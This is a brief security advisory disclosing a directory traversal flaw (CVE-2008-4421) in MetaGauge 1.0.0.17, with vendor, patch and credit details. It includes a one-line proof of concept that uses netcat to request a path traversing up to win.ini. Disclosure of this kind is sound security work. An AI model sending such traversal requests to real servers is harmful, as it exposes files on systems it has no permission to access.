Title: MetaGauge 1.0.0.17 Directory Traversal ------------------------------------------------------------- Vendor: Hammer Software Vendor URL: www.Hammer-Software.com Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release. Description: A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server. Example: C:\> nc targethost 2004 GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1 Patch Information: Hammer has addressed the issue in the latest version of MetaGauge: http://dl.hammer-software.com/metagauge.zip CVE: CVE-2008-4421 Credit: Brad Antoniewicz brad.antoniewicz@xxxxxxxxxxxxxx
